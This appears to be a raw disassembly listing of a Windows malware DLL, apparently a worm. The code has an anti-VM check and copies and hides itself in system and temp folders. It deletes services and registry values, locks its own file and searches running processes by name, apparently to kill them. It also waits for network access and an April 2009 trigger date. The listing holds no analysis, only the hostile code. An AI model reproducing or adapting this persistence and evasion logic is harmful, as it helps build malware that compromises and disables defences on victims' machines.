sub_9A3620 proc near ; CODE XREF: sub_9A3C63+13A�p
Source = byte ptr -108h
var_4 = dword ptr -4
Count = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_4], eax
push 104h ; nSize
lea eax, [ebp+Source]
push eax ; lpFilename
push 0 ; hModule
mov byte ptr [esi], 0
call GetModuleFileNameA
test eax, eax
jz short loc_9A36C0
lea eax, [ebp+Source]
push 5Ch ; Ch
push eax ; Str
call strrchr
test eax, eax
pop ecx
pop ecx
jnz short loc_9A366B
lea eax, [ebp+Source]
jmp short loc_9A366C
; ---------------------------------------------------------------------------
loc_9A366B: ; CODE XREF: sub_9A3620+41�j
inc eax
loc_9A366C: ; CODE XREF: sub_9A3620+49�j
push ebx
push edi
mov edi, [ebp+Count]
push edi ; Count
push eax ; Source
push esi ; Dest
call strncpy
lea edi, [esi+edi-1]
push esi ; Str
mov byte ptr [edi], 0
call strlen
add esp, 10h
cmp eax, 4
mov ebx, offset Str2 ; "("
jb short loc_9A36AD
push ebx ; Str2
push esi ; Str
call strlen
pop ecx
lea eax, [eax+esi-4]
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A36BE
loc_9A36AD: ; CODE XREF: sub_9A3620+72�j
push [ebp+Count] ; Count
push ebx ; Source
push esi ; Dest
call strncat
add esp, 0Ch
mov byte ptr [edi], 0
loc_9A36BE: ; CODE XREF: sub_9A3620+8B�j
pop edi
pop ebx
loc_9A36C0: ; CODE XREF: sub_9A3620+2C�j
mov ecx, [ebp+var_4]
xor ecx, ebp
call sub_9AAAC1
leave
retn
sub_9A3620 endp
; =============== S U B R O U T I N E =======================================
sub_9A36CC proc near ; CODE XREF: sub_9A3C63+183�p
push esi
push edi
push offset Srch ; lpSrch
xor edi, edi
call sub_9A66EF
test eax, eax
pop ecx
mov esi, offset FileName ; "c:\\abcdefgh.dll"
jz short loc_9A36F1
push esi ; lpBuffer
push eax ; dwProcessId
call sub_9A642B
test eax, eax
pop ecx
pop ecx
jnz short loc_9A370D
loc_9A36F1: ; CODE XREF: sub_9A36CC+16�j
push offset aT ; "t"
call sub_9A638D
test eax, eax
pop ecx
jz short loc_9A3710
push esi ; lpBuffer
push eax ; dwProcessId
call sub_9A642B
test eax, eax
pop ecx
pop ecx
jz short loc_9A3710
loc_9A370D: ; CODE XREF: sub_9A36CC+23�j
xor edi, edi
inc edi
loc_9A3710: ; CODE XREF: sub_9A36CC+32�j
; sub_9A36CC+3F�j
mov eax, edi
pop edi
pop esi
retn
sub_9A36CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0A4h
sub_9A3715 proc near ; CODE XREF: sub_9A387C+2F�p
; sub_9A387C+73�p ...
var_1D8 = dword ptr -1D8h
hMem = dword ptr -124h
nNumberOfBytesToWrite= dword ptr -120h
var_11C = dword ptr -11Ch
FileName = byte ptr -118h
var_15 = byte ptr -15h
var_14 = byte ptr -14h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-0A4h]
sub esp, 124h
mov eax, dword_9B8788
xor eax, ebp
push ebx
mov [ebp+0A4h+var_4], eax
mov eax, dword_9BB1DC
push esi
xor eax, 0C7BD45E1h
push edi
push eax ; Seed
mov esi, ecx
call srand
call rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+0A4h+var_14]
add edx, 5
push edx
push eax
call sub_9A5E65
call sub_9A5D1A
lea eax, [ebp+0A4h+var_14]
push eax
push esi
push offset nullsub_11 ; Format
lea eax, [ebp+0A4h+FileName]
push 104h ; Count
push eax ; Dest
call _snprintf
xor ebx, ebx
push ebx ; int
mov edi, 1F01FFh
lea eax, [ebp+0A4h+FileName]
push edi ; int
push eax ; Str
mov [ebp+0A4h+var_15], bl
call sub_9A68CA
add esp, 2Ch
lea eax, [ebp+0A4h+FileName]
push eax ; lpFileName
call DeleteFileA
push ebx ; int
push 1200A9h ; int
mov esi, offset FileName ; "c:\\abcdefgh.dll"
push esi ; Str
mov [ebp+0A4h+var_11C], ebx
call sub_9A68CA
add esp, 0Ch
lea eax, [ebp+0A4h+FileName]
push eax ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileA
test eax, eax
jnz short loc_9A3824
lea eax, [ebp+0A4h+nNumberOfBytesToWrite]
push esi ; lpFileName
push eax ; int
mov [ebp+0A4h+nNumberOfBytesToWrite], ebx
call sub_9A5FCF
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+0A4h+hMem], eax
jz short loc_9A3861
cmp [ebp+0A4h+nNumberOfBytesToWrite], ebx
jz short loc_9A3819
lea ecx, [ebp+0A4h+FileName]
push ecx ; lpFileName
push [ebp+0A4h+nNumberOfBytesToWrite] ; nNumberOfBytesToWrite
push eax ; lpBuffer
call sub_9A6056
add esp, 0Ch
test eax, eax
jz short loc_9A3819
push ebx ; int
push edi ; int
push esi ; Str
mov [ebp+0A4h+var_11C], 1
call sub_9A68CA
add esp, 0Ch
push 4 ; dwFlags
push ebx ; lpNewFileName
push esi ; lpExistingFileName
call MoveFileExA
loc_9A3819: ; CODE XREF: sub_9A3715+D2�j
; sub_9A3715+E6�j
push [ebp+0A4h+hMem] ; hMem
call GlobalFree
jmp short loc_9A3838
; ---------------------------------------------------------------------------
loc_9A3824: ; CODE XREF: sub_9A3715+B7�j
lea eax, [ebp+0A4h+FileName]
push 0FFFFFFFFh ; hFile
push eax ; int
mov [ebp+0A4h+var_11C], 1
call sub_9A5EC7
pop ecx
pop ecx
loc_9A3838: ; CODE XREF: sub_9A3715+10D�j
cmp [ebp+0A4h+var_11C], ebx
jz short loc_9A3861
lea eax, [ebp+0A4h+FileName]
push eax ; Str
call sub_9A7E0F
lea eax, [ebp+0A4h+FileName]
mov [esp+134h+var_1D8], 104h
push eax ; Source
push esi ; Dest
call strncpy
add esp, 0Ch
mov byte_9BB1DB, bl
loc_9A3861: ; CODE XREF: sub_9A3715+CD�j
; sub_9A3715+126�j
mov ecx, [ebp+0A4h+var_4]
mov eax, [ebp+0A4h+var_11C]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 0A4h
leave
retn
sub_9A3715 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=88h
sub_9A387C proc near ; CODE XREF: StartAddress+7B�p
Buffer = byte ptr -108h
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
lea ebp, [esp-88h]
sub esp, 108h
mov eax, dword_9B8788
push edi
xor eax, ebp
mov [ebp+88h+var_4], eax
mov edi, 104h
push edi ; uSize
lea eax, [ebp+88h+Buffer]
push eax ; lpBuffer
call GetSystemDirectoryA
lea ecx, [ebp+88h+Buffer]
call sub_9A3715
test eax, eax
jnz short loc_9A3923
push ebx
push esi
mov esi, SHGetSpecialFolderPathA
xor ebx, ebx
push ebx ; fCreate
push 26h ; csidl
lea eax, [ebp+88h+Buffer]
push eax ; pszPath
push ebx ; hwnd
call esi ; SHGetSpecialFolderPathA
push edi ; Count
call rand
and eax, 3
push Source[eax*4] ; Source
lea eax, [ebp+88h+Buffer]
push eax ; Dest
call strncat
add esp, 0Ch
lea ecx, [ebp+88h+Buffer]
mov [ebp+88h+var_5], bl
call sub_9A3715
test eax, eax
jnz short loc_9A3921
push ebx ; fCreate
push 1Ah ; csidl
lea eax, [ebp+88h+Buffer]
push eax ; pszPath
push ebx ; hwnd
call esi ; SHGetSpecialFolderPathA
lea ecx, [ebp+88h+Buffer]
call sub_9A3715
test eax, eax
jnz short loc_9A3921
lea eax, [ebp+88h+Buffer]
push eax ; lpBuffer
push edi ; nBufferLength
call GetTempPathA
lea ecx, [ebp+88h+Buffer]
call sub_9A3715
loc_9A3921: ; CODE XREF: sub_9A387C+7A�j
; sub_9A387C+90�j
pop esi
pop ebx
loc_9A3923: ; CODE XREF: sub_9A387C+36�j
mov ecx, [ebp+88h+var_4]
xor ecx, ebp
pop edi
call sub_9AAAC1
add ebp, 88h
leave
retn
sub_9A387C endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_9A3939(LPVOID)
sub_9A3939 proc near ; CODE XREF: sub_9A3939+10�j
; DATA XREF: sub_9A39CF+82�o
call sub_9A4074
push 3E8h ; dwMilliseconds
call Sleep
jmp short sub_9A3939
sub_9A3939 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A394B proc near ; CODE XREF: StartAddress+76�p
pszValue = byte ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword_9B8788
push esi
push edi
push 0 ; int
push 0 ; int
xor eax, ebp
push 1 ; int
mov [ebp+var_4], eax
push offset dword_9A13E4 ; lpValueName
call sub_9A471B
mov eax, dword_9BB1DC
xor eax, 0B30AA17Bh
push eax ; Seed
call srand
call rand
push 5
pop ecx
cdq
idiv ecx
lea eax, [ebp+pszValue]
add edx, ecx
push edx
push eax
call sub_9A5E65
add esp, 1Ch
call sub_9A5D1A
mov esi, SHDeleteValueA
lea eax, [ebp+pszValue]
push eax ; pszValue
mov edi, offset pszSubKey ; "P"
push edi ; pszSubKey
push 80000002h ; hkey
call esi ; SHDeleteValueA
lea eax, [ebp+pszValue]
push eax ; pszValue
push edi ; pszSubKey
push 80000001h ; hkey
call esi ; SHDeleteValueA
mov ecx, [ebp+var_4]
pop edi
xor ecx, ebp
pop esi
call sub_9AAAC1
leave
retn
sub_9A394B endp
; =============== S U B R O U T I N E =======================================
sub_9A39CF proc near ; CODE XREF: StartAddress+9F�p
var_C = dword ptr -0Ch
ThreadId = dword ptr -4
push ecx
push esi
push offset dword_9A1570 ; lpServiceName
call sub_9A5D62
mov [esp+0Ch+var_C], offset dword_9A1564
call sub_9A5D62
mov [esp+0Ch+var_C], offset dword_9A1558
call sub_9A5D62
mov [esp+0Ch+var_C], offset dword_9A1550
call sub_9A5D62
mov [esp+0Ch+var_C], offset dword_9A1548
call sub_9A5D62
mov [esp+0Ch+var_C], offset dword_9A1540
call sub_9A5D62
mov [esp+0Ch+var_C], offset dword_9A152C
push offset pszSubKey ; "P"
mov esi, 80000002h
push esi ; hkey
call SHDeleteValueA
push offset dword_9A1450 ; pszSubKey
push esi ; hkey
call sub_9A7156
push offset dword_9A13F8 ; pszSubKey
push esi ; hkey
call sub_9A7156
add esp, 10h
lea eax, [esp+8+ThreadId]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push eax ; lpParameter
push offset sub_9A3939 ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
pop esi
pop ecx
retn
sub_9A39CF endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A3A68(LPCSTR Str)
sub_9A3A68 proc near ; CODE XREF: StartAddress+99�p
Str = dword ptr 4
push ebx
push ebp
push esi
push edi
xor edi, edi
push edi ; int
push 1200A9h ; int
push [esp+18h+Str] ; Str
call sub_9A68CA
mov ebx, CreateFileA
add esp, 0Ch
push edi ; hTemplateFile
push edi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push edi ; lpSecurityAttributes
push 2 ; dwShareMode
mov ebp, 80000000h
push ebp ; dwDesiredAccess
push [esp+28h+Str] ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_9A3AB5
push edi ; hTemplateFile
push edi ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push edi ; lpSecurityAttributes
push 3 ; dwShareMode
push ebp ; dwDesiredAccess
push [esp+28h+Str] ; lpFileName
call ebx ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9A3AC8
loc_9A3AB5: ; CODE XREF: sub_9A3A68+36�j
push edi ; nNumberOfBytesToLockHigh
push edi ; lpFileSizeHigh
push esi ; hFile
call GetFileSize
push eax ; nNumberOfBytesToLockLow
push edi ; dwFileOffsetHigh
push edi ; dwFileOffsetLow
push esi ; hFile
call LockFile
loc_9A3AC8: ; CODE XREF: sub_9A3A68+4B�j
call sub_9A7054
test eax, eax
jnz short loc_9A3AE0
push edi ; int
push 20h ; int
push [esp+18h+Str] ; Str
call sub_9A68CA
add esp, 0Ch
loc_9A3AE0: ; CODE XREF: sub_9A3A68+67�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_9A3A68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame fpd=12Ch
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_9A3C63+24A�o
SystemTime = _SYSTEMTIME ptr -1ACh
var_19C = dword ptr -19Ch
dwFlags = dword ptr -198h
WSAData = WSAData ptr -194h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-12Ch]
sub esp, 1ACh
mov eax, dword_9B8788
push ebx
push esi
push edi
xor eax, ebp
push 8003h ; uMode
mov [ebp+12Ch+var_4], eax
call SetErrorMode
sldt ax
test ax, ax
mov edi, Sleep
jz short loc_9A3B20
push 0FFFFFFFFh ; dwMilliseconds
call edi ; Sleep
loc_9A3B20: ; CODE XREF: StartAddress+35�j
call sub_9A5D1A
mov esi, offset FileName ; "c:\\abcdefgh.dll"
push esi ; Str
call strlen
cmp eax, 9
pop ecx
jbe short loc_9A3B56
push offset asc_9A1318 ; "H"
push esi ; Str
call strlen
pop ecx
mov ecx, esi
sub ecx, 4
add eax, ecx
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A3B65
loc_9A3B56: ; CODE XREF: StartAddress+4F�j
call sub_9A5C69
call sub_9A394B
call sub_9A387C
loc_9A3B65: ; CODE XREF: StartAddress+6F�j
call GetVersion
cmp ax, 5
jnz short loc_9A3B78
call sub_9A5C35
jmp short loc_9A3B7D
; ---------------------------------------------------------------------------
loc_9A3B78: ; CODE XREF: StartAddress+8A�j
call sub_9A5C01
loc_9A3B7D: ; CODE XREF: StartAddress+91�j
push esi ; Str
call sub_9A3A68
pop ecx
call sub_9A39CF
lea eax, [ebp+12Ch+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call WSAStartup
mov esi, rand
call esi ; rand
push 1Eh
cdq
pop ecx
idiv ecx
add edx, 5
imul edx, 0EA60h
push edx ; dwMilliseconds
call edi ; Sleep
and [ebp+12Ch+var_19C], 0
push 63h
call sub_9B2118
test eax, eax
jz short loc_9A3BC9
call sub_9B1584
mov [ebp+12Ch+var_19C], eax
loc_9A3BC9: ; CODE XREF: StartAddress+DA�j
mov ebx, GetLocalTime
lea eax, [ebp+12Ch+SystemTime]
push eax ; lpSystemTime
call ebx ; GetLocalTime
cmp [ebp+12Ch+SystemTime.wHour], 7
jb short loc_9A3BEA
cmp [ebp+12Ch+SystemTime.wHour], 0Bh
mov [ebp+12Ch+dwFlags], 2A30h
jbe short loc_9A3BF1
loc_9A3BEA: ; CODE XREF: StartAddress+F5�j
mov [ebp+12Ch+dwFlags], 0E10h
loc_9A3BF1: ; CODE XREF: StartAddress+103�j
call esi ; rand
cdq
idiv [ebp+12Ch+dwFlags]
add edx, 708h
imul edx, 3E8h
push edx ; dwMilliseconds
loc_9A3C04: ; CODE XREF: StartAddress+175�j
; StartAddress+17C�j
call edi ; Sleep
xor esi, esi
push esi ; dwReserved
lea eax, [ebp+12Ch+dwFlags]
push eax ; lpdwFlags
call InternetGetConnectedState
test eax, eax
jz short loc_9A3C5C
lea eax, [ebp+12Ch+SystemTime]
push eax ; lpSystemTime
call ebx ; GetLocalTime
cmp [ebp+12Ch+SystemTime.wYear], 7D9h
ja short loc_9A3C37
jnz short loc_9A3C4D
cmp [ebp+12Ch+SystemTime.wMonth], 4
ja short loc_9A3C37
jnz short loc_9A3C4D
cmp [ebp+12Ch+SystemTime.wDay], 1
jb short loc_9A3C4D
loc_9A3C37: ; CODE XREF: StartAddress+13E�j
; StartAddress+147�j
cmp [ebp+12Ch+var_19C], 0
jz short loc_9A3C46
call sub_9B36E8
test eax, eax
jnz short loc_9A3C4D
loc_9A3C46: ; CODE XREF: StartAddress+156�j
call sub_9A857A
mov esi, eax
loc_9A3C4D: ; CODE XREF: StartAddress+140�j
; StartAddress+149�j ...
imul esi, 0F731400h
add esi, 5265C00h
push esi
jmp short loc_9A3C04
; ---------------------------------------------------------------------------
loc_9A3C5C: ; CODE XREF: StartAddress+130�j
push 0EA60h
jmp short loc_9A3C04
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=198h
; int __fastcall sub_9A3C63(HMODULE hModule)
sub_9A3C63 proc near ; CODE XREF: DllMain(x,x,x)+BC�p
var_3C0 = dword ptr -3C0h
hObject = dword ptr -218h
ThreadId = dword ptr -214h
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
Name = byte ptr -208h
var_109 = byte ptr -109h
Str1 = byte ptr -108h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-198h]
sub esp, 218h
mov eax, dword_9B8788
push ebx
xor eax, ebp
push esi
push edi
mov [ebp+198h+var_4], eax
mov edi, ecx
call sub_9A67C6
call sub_9A5B2E
mov esi, 104h
push esi ; nSize
push offset FileName ; "c:\\abcdefgh.dll"
push edi ; hModule
call GetModuleFileNameA
push 1 ; int
push offset Name ; "²\""
mov byte_9BB1DB, 0
call sub_9A5DFA
pop ecx
pop ecx
lea eax, [ebp+198h+ThreadId]
push eax ; nSize
lea eax, [ebp+198h+Str1]
push eax ; lpBuffer
mov [ebp+198h+ThreadId], esi
mov [ebp+198h+Str1], 0
call GetComputerNameA
lea eax, [ebp+198h+Str1]
push eax ; Str
call strlen
push eax
lea eax, [ebp+198h+Str1]
push eax
call sub_9A9FAE
mov dword_9BB1DC, eax
xor eax, 18A94C39h
push eax ; Seed
call srand
call rand
push 3
pop ecx
cdq
idiv ecx
add edx, 6
push edx
push offset aNmqflzhf ; "nmqflzhf"
call sub_9A5E65
call sub_9A5D1A
push dword_9BB1DC
mov edi, _snprintf
push offset Format ; "x\""
lea eax, [ebp+198h+Name]
push 100h ; Count
push eax ; Dest
call edi ; _snprintf
mov ebx, CreateMutexA
add esp, 28h
lea eax, [ebp+198h+Name]
push eax ; lpName
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
mov [ebp+198h+var_109], 0
call ebx ; CreateMutexA
push 63h
push dword_9BB1DC
lea eax, [ebp+198h+Name]
push offset a0 ; "0\""
push 100h ; Count
push eax ; Dest
call edi ; _snprintf
add esp, 14h
lea eax, [ebp+198h+Name]
push eax ; lpName
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
mov [ebp+198h+var_109], 0
call ebx ; CreateMutexA
mov [ebp+198h+hObject], eax
call GetLastError
mov [ebp+198h+var_20C], eax
call sub_9A6A91
mov edi, eax
call GetCommandLineA
push esi ; lpFirst
lea esi, [ebp+198h+Str1]
mov [ebp+198h+var_210], eax
call sub_9A3620
mov eax, esi
mov esi, _stricmp
mov [esp+228h+var_3C0], offset dword_9A15B4
push eax ; Str1
call esi ; _stricmp
test eax, eax
mov ebx, StrStrIA
pop ecx
pop ecx
jnz short loc_9A3E02
push offset aNmqflzhf ; "nmqflzhf"
push [ebp+198h+var_210]
call ebx ; StrStrIA
test eax, eax
jz short loc_9A3E02
cmp [ebp+198h+var_20C], 0B7h
jz short loc_9A3DFA
cmp [ebp+198h+var_20C], 5
jz short loc_9A3DFA
push [ebp+198h+hObject] ; hObject
call CloseHandle
call sub_9A36CC
test eax, eax
jz short loc_9A3DFA
push 0BB8h ; dwMilliseconds
call Sleep
loc_9A3DFA: ; CODE XREF: sub_9A3C63+172�j
; sub_9A3C63+178�j ...
push 0 ; uExitCode
call ExitProcess
; ---------------------------------------------------------------------------
loc_9A3E02: ; CODE XREF: sub_9A3C63+15B�j
; sub_9A3C63+169�j
test edi, edi
jz short loc_9A3E6E
call GetVersion
cmp ax, 5
jnz short loc_9A3E32
lea eax, [ebp+198h+Str1]
push offset aServ ; "servÈ!"
push eax ; Str1
call esi ; _stricmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9A3E32
call sub_9A5B0F
call sub_9A5BCD
jmp short loc_9A3E6E
; ---------------------------------------------------------------------------
loc_9A3E32: ; CODE XREF: sub_9A3C63+1AD�j
; sub_9A3C63+1C1�j
lea eax, [ebp+198h+Str1]
push offset aJ ; "†!"
push eax ; Str1
call esi ; _stricmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9A3E6E
push offset dword_9A158C
push [ebp+198h+var_210]
call ebx ; StrStrIA
test eax, eax
jz short loc_9A3E5B
call sub_9A5B0F
jmp short loc_9A3E6E
; ---------------------------------------------------------------------------
loc_9A3E5B: ; CODE XREF: sub_9A3C63+1EF�j
push offset dword_9A1578
push [ebp+198h+var_210]
call ebx ; StrStrIA
test eax, eax
jz short loc_9A3E6E
call sub_9A5B4D
loc_9A3E6E: ; CODE XREF: sub_9A3C63+1A1�j
; sub_9A3C63+1CD�j ...
lea eax, [ebp+198h+Str1]
push offset aJ ; "†!"
push eax ; Str1
call esi ; _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9A3E96
lea eax, [ebp+198h+Str1]
push offset aT ; "t"
push eax ; Str1
call esi ; _stricmp
test eax, eax
pop ecx
pop ecx
jnz short loc_9A3EC1
loc_9A3E96: ; CODE XREF: sub_9A3C63+21D�j
cmp [ebp+198h+var_20C], 0B7h
jz short loc_9A3EC1
cmp [ebp+198h+var_20C], 5
jz short loc_9A3EC1
lea eax, [ebp+198h+ThreadId]
push eax ; lpThreadId
xor eax, eax
push eax ; dwCreationFlags
push eax ; lpParameter
push offset StartAddress ; lpStartAddress
push eax ; dwStackSize
push eax ; lpThreadAttributes
call CreateThread
push eax ; hObject
call CloseHandle
loc_9A3EC1: ; CODE XREF: sub_9A3C63+231�j
; sub_9A3C63+23A�j ...
mov ecx, [ebp+198h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
add ebp, 198h
leave
retn
sub_9A3C63 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
_DllMain@12 proc near ; CODE XREF: start+4B�p
Name = byte ptr -18h
var_4 = dword ptr -4
hinstDLL = dword ptr 8
fdwReason = dword ptr 0Ch
hModule = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, dword_9B8788
push ebx
xor eax, ebp
cmp [ebp+fdwReason], 1
push esi
mov esi, [ebp+hinstDLL]
mov [ebp+var_4], eax
push edi
jnz loc_9A3FA2
mov ebx, [ebp+hModule]
test ebx, ebx
jz short loc_9A3F14
push offset dword_9BB0D0
push offset dword_9BB0CC
mov esi, ebx
call sub_9A71B6
pop ecx
jmp short loc_9A3F25
; ---------------------------------------------------------------------------
loc_9A3F14: ; CODE XREF: DllMain(x,x,x)+25�j
push esi
mov dword_9BB0CC, esi
call sub_9A7177
mov dword_9BB0D0, eax
loc_9A3F25: ; CODE XREF: DllMain(x,x,x)+39�j
pop ecx
push esi ; hLibModule
call DisableThreadLibraryCalls
test ebx, ebx
jz short loc_9A3F89
call GetCurrentProcessId
xor eax, 630063h
push eax ; Seed
call srand
call rand
push 7
cdq
pop ecx
idiv ecx
lea eax, [ebp+Name]
add edx, 0Ah
push edx
push eax
call sub_9A5E65
add esp, 0Ch
lea eax, [ebp+Name]
push eax ; lpName
push 0 ; bInitialOwner
push 0 ; lpMutexAttributes
call CreateMutexA
mov edi, eax
test edi, edi
jz short loc_9A3F89
call GetLastError
cmp eax, 0B7h
jnz short loc_9A3F89
push edi ; hObject
call CloseHandle
jmp short loc_9A3F9E
; ---------------------------------------------------------------------------
loc_9A3F89: ; CODE XREF: DllMain(x,x,x)+56�j
; DllMain(x,x,x)+98�j ...
call GetVersion
cmp al, 5
jb short loc_9A3F9A
mov ecx, esi ; hModule
call sub_9A3C63
loc_9A3F9A: ; CODE XREF: DllMain(x,x,x)+B8�j
test ebx, ebx
jz short loc_9A3FA2
loc_9A3F9E: ; CODE XREF: DllMain(x,x,x)+AE�j
xor eax, eax
jmp short loc_9A3FA5
; ---------------------------------------------------------------------------
loc_9A3FA2: ; CODE XREF: DllMain(x,x,x)+1A�j
; DllMain(x,x,x)+C3�j
xor eax, eax
inc eax
loc_9A3FA5: ; CODE XREF: DllMain(x,x,x)+C7�j
mov ecx, [ebp+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_9AAAC1
leave
retn 0Ch
_DllMain@12 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A3FB6(char *lpFirst)
sub_9A3FB6 proc near ; CODE XREF: sub_9A53AE+1C�p
; sub_9A5421+71�p ...
lpFirst = dword ptr 4
push ebx
mov ebx, [esp+4+lpFirst]
push ebp
push edi
push 2Eh ; Ch
push ebx ; Str
xor ebp, ebp
call strrchr
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_9A402D
push esi
xor esi, esi
loc_9A3FD3: ; CODE XREF: sub_9A3FB6+37�j
push off_9B8090[esi] ; lpSrch
push ebx ; lpFirst
call StrStrIA
test eax, eax
jnz short loc_9A4029
add esi, 4
cmp esi, 13Ch
jb short loc_9A3FD3
jmp short loc_9A3FFB
; ---------------------------------------------------------------------------
loc_9A3FF1: ; CODE XREF: sub_9A3FB6+47�j
lea eax, [edi-1]
cmp byte ptr [eax], 2Eh
jz short loc_9A3FFF
mov edi, eax
loc_9A3FFB: ; CODE XREF: sub_9A3FB6+39�j
cmp edi, ebx
ja short loc_9A3FF1
loc_9A3FFF: ; CODE XREF: sub_9A3FB6+41�j
xor ebx, ebx
loc_9A4001: ; CODE XREF: sub_9A3FB6+6F�j
lea esi, off_9B81CC[ebx]
push dword ptr [esi] ; Str
call strlen
push eax ; MaxCount
push dword ptr [esi] ; Str
push edi ; Str1
call _strnicmp
add esp, 10h
test eax, eax
jz short loc_9A4029
add ebx, 4
cmp ebx, 38h
jb short loc_9A4001
jmp short loc_9A402C
; ---------------------------------------------------------------------------
loc_9A4029: ; CODE XREF: sub_9A3FB6+2C�j
; sub_9A3FB6+67�j
xor ebp, ebp
inc ebp
loc_9A402C: ; CODE XREF: sub_9A3FB6+71�j
pop esi
loc_9A402D: ; CODE XREF: sub_9A3FB6+18�j
pop edi
mov eax, ebp
pop ebp
pop ebx
retn
sub_9A3FB6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9A4033(u_long netlong)
sub_9A4033 proc near ; CODE XREF: sub_9A857A+1F8�p
; sub_9AFCA0+6�p
netlong = dword ptr 4
push esi
push [esp+4+netlong]
xor esi, esi
call sub_9A5C88
test eax, eax
pop ecx
jz short loc_9A4070
push [esp+4+netlong] ; netlong
call ntohl
xor ecx, ecx
loc_9A4050: ; CODE XREF: sub_9A4033+36�j
cmp eax, dword_9A15F8[ecx]
jb short loc_9A4070
cmp eax, dword_9A15FC[ecx]
jbe short loc_9A406D
add ecx, 8
cmp ecx, 0C78h
jb short loc_9A4050
jmp short loc_9A4070
; ---------------------------------------------------------------------------
loc_9A406D: ; CODE XREF: sub_9A4033+2B�j
xor esi, esi
inc esi
loc_9A4070: ; CODE XREF: sub_9A4033+F�j
; sub_9A4033+23�j ...
mov eax, esi
pop esi
retn
sub_9A4033 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A4074 proc near ; CODE XREF: sub_9A3939�p
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
Str = PROCESSENTRY32 ptr -144h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 13Ch
push offset stru_9A26B0
call __SEH_prolog
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
xor ebx, ebx
mov [ebp+ms_exc.disabled], ebx
push ebx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot
mov esi, eax
mov [ebp+var_14C], esi
cmp esi, 0FFFFFFFFh
jz loc_9A4143
mov [ebp+Str.dwSize], 128h
push 49h
pop ecx
xor eax, eax
lea edi, [ebp+Str.cntUsage]
rep stosd
lea eax, [ebp+Str]
push eax ; lppe
push esi ; hSnapshot
call Process32First
jmp short loc_9A412F
; ---------------------------------------------------------------------------
loc_9A40D1: ; CODE XREF: sub_9A4074+BD�j
lea eax, [ebp+Str.szExeFile]
push eax ; Str
call _strlwr
pop ecx
mov [ebp+var_148], ebx
loc_9A40E5: ; CODE XREF: sub_9A4074+AC�j
cmp [ebp+var_148], 17h
jnb short loc_9A4122
mov eax, [ebp+var_148]
push off_9B8030[eax*4] ; SubStr
lea eax, [ebp+Str.szExeFile]
push eax ; Str
call strstr
pop ecx
pop ecx
test eax, eax
jz short loc_9A411A
push [ebp+Str.th32ProcessID] ; dwProcessId
call sub_9A62C0
pop ecx
loc_9A411A: ; CODE XREF: sub_9A4074+98�j
inc [ebp+var_148]
jmp short loc_9A40E5
; ---------------------------------------------------------------------------
loc_9A4122: ; CODE XREF: sub_9A4074+78�j
lea eax, [ebp+Str]
push eax ; lppe
push esi ; hSnapshot
call Process32Next
loc_9A412F: ; CODE XREF: sub_9A4074+5B�j
test eax, eax
jnz short loc_9A40D1
push esi ; hObject
call CloseHandle
jmp short loc_9A4143
; ---------------------------------------------------------------------------
loc_9A413C: ; DATA XREF: .text:stru_9A26B0�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A4140: ; DATA XREF: .text:stru_9A26B0�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A4143: ; CODE XREF: sub_9A4074+31�j
; sub_9A4074+C6�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
call __SEH_epilog
retn
sub_9A4074 endp
